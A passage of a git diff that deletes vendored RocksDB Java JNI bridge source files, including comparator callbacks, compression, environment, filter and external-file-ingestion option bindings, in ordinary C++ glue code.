-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    *key = result;
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-BaseComparatorJniCallback::~BaseComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jComparator != nullptr) {
-    env->DeleteGlobalRef(m_jComparator);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-ComparatorJniCallback::ComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt) :
-    BaseComparatorJniCallback(env, jComparator, copt) {
-  m_jSliceA = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceA == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceB = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceB == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceLimit = env->NewGlobalRef(SliceJni::construct0(env));
-  if(m_jSliceLimit == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-ComparatorJniCallback::~ComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jSliceA != nullptr) {
-    env->DeleteGlobalRef(m_jSliceA);
-  }
-
-  if(m_jSliceB != nullptr) {
-    env->DeleteGlobalRef(m_jSliceB);
-  }
-
-  if(m_jSliceLimit != nullptr) {
-    env->DeleteGlobalRef(m_jSliceLimit);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-DirectComparatorJniCallback::DirectComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt) :
-    BaseComparatorJniCallback(env, jComparator, copt) {
-  m_jSliceA = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceA == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceB = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceB == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jSliceLimit = env->NewGlobalRef(DirectSliceJni::construct0(env));
-  if(m_jSliceLimit == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-DirectComparatorJniCallback::~DirectComparatorJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jSliceA != nullptr) {
-    env->DeleteGlobalRef(m_jSliceA);
-  }
-
-  if(m_jSliceB != nullptr) {
-    env->DeleteGlobalRef(m_jSliceB);
-  }
-
-  if(m_jSliceLimit != nullptr) {
-    env->DeleteGlobalRef(m_jSliceLimit);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h b/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h
deleted file mode 100644
index a753008..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.h
+++ /dev/null
@@ -1,94 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator and rocksdb::DirectComparator.
-
-#ifndef JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
-#define JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
-
-#include <jni.h>
-#include <string>
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-struct ComparatorJniCallbackOptions {
-  // Use adaptive mutex, which spins in the user space before resorting
-  // to kernel. This could reduce context switch when the mutex is not
-  // heavily contended. However, if the mutex is hot, we could end up
-  // wasting spin time.
-  // Default: false
-  bool use_adaptive_mutex;
-
-  ComparatorJniCallbackOptions() : use_adaptive_mutex(false) {
-  }
-};
-
-/**
- * This class acts as a bridge between C++
- * and Java. The methods in this class will be
- * called back from the RocksDB storage engine (C++)
- * we then callback to the appropriate Java method
- * this enables Comparators to be implemented in Java.
- *
- * The design of this Comparator caches the Java Slice
- * objects that are used in the compare and findShortestSeparator
- * method callbacks. Instead of creating new objects for each callback
- * of those functions, by reuse via setHandle we are a lot
- * faster; Unfortunately this means that we have to
- * introduce independent locking in regions of each of those methods
- * via the mutexs mtx_compare and mtx_findShortestSeparator respectively
- */
-class BaseComparatorJniCallback : public Comparator {
- public:
-    BaseComparatorJniCallback(
-      JNIEnv* env, jobject jComparator,
-      const ComparatorJniCallbackOptions* copt);
-    virtual ~BaseComparatorJniCallback();
-    virtual const char* Name() const;
-    virtual int Compare(const Slice& a, const Slice& b) const;
-    virtual void FindShortestSeparator(
-      std::string* start, const Slice& limit) const;
-    virtual void FindShortSuccessor(std::string* key) const;
-
- private:
-    // used for synchronisation in compare method
-    port::Mutex* mtx_compare;
-    // used for synchronisation in findShortestSeparator method
-    port::Mutex* mtx_findShortestSeparator;
-    jobject m_jComparator;
-    std::string m_name;
-    jmethodID m_jCompareMethodId;
-    jmethodID m_jFindShortestSeparatorMethodId;
-    jmethodID m_jFindShortSuccessorMethodId;
-
- protected:
-    JavaVM* m_jvm;
-    jobject m_jSliceA;
-    jobject m_jSliceB;
-    jobject m_jSliceLimit;
-};
-
-class ComparatorJniCallback : public BaseComparatorJniCallback {
- public:
-      ComparatorJniCallback(
-        JNIEnv* env, jobject jComparator,
-        const ComparatorJniCallbackOptions* copt);
-      ~ComparatorJniCallback();
-};
-
-class DirectComparatorJniCallback : public BaseComparatorJniCallback {
- public:
-      DirectComparatorJniCallback(
-        JNIEnv* env, jobject jComparator,
-        const ComparatorJniCallbackOptions* copt);
-      ~DirectComparatorJniCallback();
-};
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_COMPARATORJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/compression_options.cc b/thirdparty/rocksdb/java/rocksjni/compression_options.cc
deleted file mode 100644
index 7d5af64..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compression_options.cc
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompressionOptions.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompressionOptions.h"
-#include "rocksdb/advanced_options.h"
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    newCompressionOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompressionOptions_newCompressionOptions(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompressionOptions();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setWindowBits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setWindowBits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jwindow_bits) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->window_bits = static_cast<int>(jwindow_bits);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    windowBits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_windowBits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->window_bits);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setLevel
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jlevel) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->level = static_cast<int>(jlevel);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    level
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_level(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->level);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setStrategy
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setStrategy(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jstrategy) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->strategy = static_cast<int>(jstrategy);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    strategy
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_strategy(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->strategy);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    setMaxDictBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompressionOptions_setMaxDictBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_dict_bytes) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  opt->max_dict_bytes = static_cast<int>(jmax_dict_bytes);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    maxDictBytes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompressionOptions_maxDictBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-  return static_cast<jint>(opt->max_dict_bytes);
-}
-
-/*
- * Class:     org_rocksdb_CompressionOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompressionOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompressionOptions*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/env.cc b/thirdparty/rocksdb/java/rocksjni/env.cc
deleted file mode 100644
index dc949a0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/env.cc
+++ /dev/null
@@ -1,81 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Env methods from Java side.
-
-#include "include/org_rocksdb_Env.h"
-#include "include/org_rocksdb_RocksEnv.h"
-#include "include/org_rocksdb_RocksMemEnv.h"
-#include "rocksdb/env.h"
-
-/*
- * Class:     org_rocksdb_Env
- * Method:    getDefaultEnvInternal
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Env_getDefaultEnvInternal(
-    JNIEnv* env, jclass jclazz) {
-  return reinterpret_cast<jlong>(rocksdb::Env::Default());
-}
-
-/*
- * Class:     org_rocksdb_Env
- * Method:    setBackgroundThreads
- * Signature: (JII)V
- */
-void Java_org_rocksdb_Env_setBackgroundThreads(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint num, jint priority) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jhandle);
-  switch (priority) {
-    case org_rocksdb_Env_FLUSH_POOL:
-      rocks_env->SetBackgroundThreads(num, rocksdb::Env::Priority::LOW);
-      break;
-    case org_rocksdb_Env_COMPACTION_POOL:
-      rocks_env->SetBackgroundThreads(num, rocksdb::Env::Priority::HIGH);
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_sEnv
- * Method:    getThreadPoolQueueLen
- * Signature: (JI)I
- */
-jint Java_org_rocksdb_Env_getThreadPoolQueueLen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint pool_id) {
-  auto* rocks_env = reinterpret_cast<rocksdb::Env*>(jhandle);
-  switch (pool_id) {
-    case org_rocksdb_RocksEnv_FLUSH_POOL:
-      return rocks_env->GetThreadPoolQueueLen(rocksdb::Env::Priority::LOW);
-    case org_rocksdb_RocksEnv_COMPACTION_POOL:
-      return rocks_env->GetThreadPoolQueueLen(rocksdb::Env::Priority::HIGH);
-  }
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksMemEnv
- * Method:    createMemEnv
- * Signature: ()J
- */
-jlong Java_org_rocksdb_RocksMemEnv_createMemEnv(
-    JNIEnv* env, jclass jclazz) {
-  return reinterpret_cast<jlong>(rocksdb::NewMemEnv(
-      rocksdb::Env::Default()));
-}
-
-/*
- * Class:     org_rocksdb_RocksMemEnv
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksMemEnv_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* e = reinterpret_cast<rocksdb::Env*>(jhandle);
-  assert(e != nullptr);
-  delete e;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/env_options.cc b/thirdparty/rocksdb/java/rocksjni/env_options.cc
deleted file mode 100644
index 538b0b6..0000000
--- a/thirdparty/rocksdb/java/rocksjni/env_options.cc
+++ /dev/null
@@ -1,297 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::EnvOptions methods
-// from Java side.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_EnvOptions.h"
-#include "rocksdb/env.h"
-
-#define ENV_OPTIONS_SET_BOOL(_jhandle, _opt)                \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<bool>(_opt)
-
-#define ENV_OPTIONS_SET_SIZE_T(_jhandle, _opt)              \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<size_t>(_opt)
-
-#define ENV_OPTIONS_SET_UINT64_T(_jhandle, _opt)            \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt = \
-      static_cast<uint64_t>(_opt)
-
-#define ENV_OPTIONS_GET(_jhandle, _opt) \
-  reinterpret_cast<rocksdb::EnvOptions *>(_jhandle)->_opt
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    newEnvOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_EnvOptions_newEnvOptions(JNIEnv *env, jclass jcls) {
-  auto *env_opt = new rocksdb::EnvOptions();
-  return reinterpret_cast<jlong>(env_opt);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_EnvOptions_disposeInternal(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle) {
-  auto* eo = reinterpret_cast<rocksdb::EnvOptions *>(jhandle);
-  assert(eo != nullptr);
-  delete eo;
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseDirectReads(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle,
-                                                   jboolean use_direct_reads) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useDirectReads(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseDirectWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseDirectWrites(
-    JNIEnv *env, jobject jobj, jlong jhandle, jboolean use_direct_writes) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_direct_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useDirectWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useDirectWrites(JNIEnv *env, jobject jobj,
-                                                     jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_direct_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseMmapReads(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jboolean use_mmap_reads) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useMmapReads(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setUseMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setUseMmapWrites(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle,
-                                                  jboolean use_mmap_writes) {
-  ENV_OPTIONS_SET_BOOL(jhandle, use_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    useMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_useMmapWrites(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, use_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setAllowFallocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setAllowFallocate(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle,
-                                                   jboolean allow_fallocate) {
-  ENV_OPTIONS_SET_BOOL(jhandle, allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    allowFallocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_allowFallocate(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setSetFdCloexec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setSetFdCloexec(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jboolean set_fd_cloexec) {
-  ENV_OPTIONS_SET_BOOL(jhandle, set_fd_cloexec);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setFdCloexec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_setFdCloexec(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, set_fd_cloexec);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setBytesPerSync(JNIEnv *env, jobject jobj,
-                                                 jlong jhandle,
-                                                 jlong bytes_per_sync) {
-  ENV_OPTIONS_SET_UINT64_T(jhandle, bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_bytesPerSync(JNIEnv *env, jobject jobj,
-                                               jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setFallocateWithKeepSize
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_EnvOptions_setFallocateWithKeepSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jboolean fallocate_with_keep_size) {
-  ENV_OPTIONS_SET_BOOL(jhandle, fallocate_with_keep_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    fallocateWithKeepSize
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_EnvOptions_fallocateWithKeepSize(JNIEnv *env,
-                                                           jobject jobj,
-                                                           jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, fallocate_with_keep_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setCompactionReadaheadSize(
-    JNIEnv *env, jobject jobj, jlong jhandle, jlong compaction_readahead_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_compactionReadaheadSize(JNIEnv *env,
-                                                          jobject jobj,
-                                                          jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setRandomAccessMaxBufferSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jlong random_access_max_buffer_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_randomAccessMaxBufferSize(JNIEnv *env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setWritableFileMaxBufferSize(
-    JNIEnv *env, jobject jobj, jlong jhandle,
-    jlong writable_file_max_buffer_size) {
-  ENV_OPTIONS_SET_SIZE_T(jhandle, writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_EnvOptions_writableFileMaxBufferSize(JNIEnv *env,
-                                                            jobject jobj,
-                                                            jlong jhandle) {
-  return ENV_OPTIONS_GET(jhandle, writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_EnvOptions
- * Method:    setRateLimiter
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_EnvOptions_setRateLimiter(JNIEnv *env, jobject jobj,
-                                                jlong jhandle,
-                                                jlong rl_handle) {
-  auto* sptr_rate_limiter =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(rl_handle);
-  auto* env_opt = reinterpret_cast<rocksdb::EnvOptions *>(jhandle);
-  env_opt->rate_limiter = sptr_rate_limiter->get();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/filter.cc b/thirdparty/rocksdb/java/rocksjni/filter.cc
deleted file mode 100644
index 7b186b8..0000000
--- a/thirdparty/rocksdb/java/rocksjni/filter.cc
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::FilterPolicy.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_Filter.h"
-#include "include/org_rocksdb_BloomFilter.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/filter_policy.h"
-
-/*
- * Class:     org_rocksdb_BloomFilter
- * Method:    createBloomFilter
- * Signature: (IZ)J
- */
-jlong Java_org_rocksdb_BloomFilter_createNewBloomFilter(
-    JNIEnv* env, jclass jcls, jint bits_per_key,
-    jboolean use_block_base_builder) {
-  auto* sptr_filter =
-      new std::shared_ptr<const rocksdb::FilterPolicy>(
-          rocksdb::NewBloomFilterPolicy(bits_per_key, use_block_base_builder));
-  return reinterpret_cast<jlong>(sptr_filter);
-}
-
-/*
- * Class:     org_rocksdb_Filter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Filter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<const rocksdb::FilterPolicy> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc b/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc
deleted file mode 100644
index 251a6e3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ingest_external_file_options.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::FilterPolicy.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_IngestExternalFileOptions.h"
-#include "rocksdb/options.h"
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    newIngestExternalFileOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_IngestExternalFileOptions_newIngestExternalFileOptions__(
-    JNIEnv* env, jclass jclazz) {
-  auto* options = new rocksdb::IngestExternalFileOptions();
-  return reinterpret_cast<jlong>(options);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    newIngestExternalFileOptions
- * Signature: (ZZZZ)J
- */
-jlong Java_org_rocksdb_IngestExternalFileOptions_newIngestExternalFileOptions__ZZZZ(
-    JNIEnv* env, jclass jcls, jboolean jmove_files,
-    jboolean jsnapshot_consistency, jboolean jallow_global_seqno,
-    jboolean jallow_blocking_flush) {
-  auto* options = new rocksdb::IngestExternalFileOptions();
-  options->move_files = static_cast<bool>(jmove_files);
-  options->snapshot_consistency = static_cast<bool>(jsnapshot_consistency);
-  options->allow_global_seqno = static_cast<bool>(jallow_global_seqno);
-  options->allow_blocking_flush = static_cast<bool>(jallow_blocking_flush);
-  return reinterpret_cast<jlong>(options);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    moveFiles
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_moveFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->move_files);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setMoveFiles
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setMoveFiles(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jmove_files) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->move_files = static_cast<bool>(jmove_files);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    snapshotConsistency
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_snapshotConsistency(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->snapshot_consistency);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setSnapshotConsistency
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setSnapshotConsistency(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jsnapshot_consistency) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->snapshot_consistency = static_cast<bool>(jsnapshot_consistency);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    allowGlobalSeqNo
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_allowGlobalSeqNo(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  return static_cast<jboolean>(options->allow_global_seqno);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    setAllowGlobalSeqNo
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_IngestExternalFileOptions_setAllowGlobalSeqNo(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_global_seqno) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
-  options->allow_global_seqno = static_cast<bool>(jallow_global_seqno);
-}
-
-/*
- * Class:     org_rocksdb_IngestExternalFileOptions
- * Method:    allowBlockingFlush
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_IngestExternalFileOptions_allowBlockingFlush(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* options =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(jhandle);
